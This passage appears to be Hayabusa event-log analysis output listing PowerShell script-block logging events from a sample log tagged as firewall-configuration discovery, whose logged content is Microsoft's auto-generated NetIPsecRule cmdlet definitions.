[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 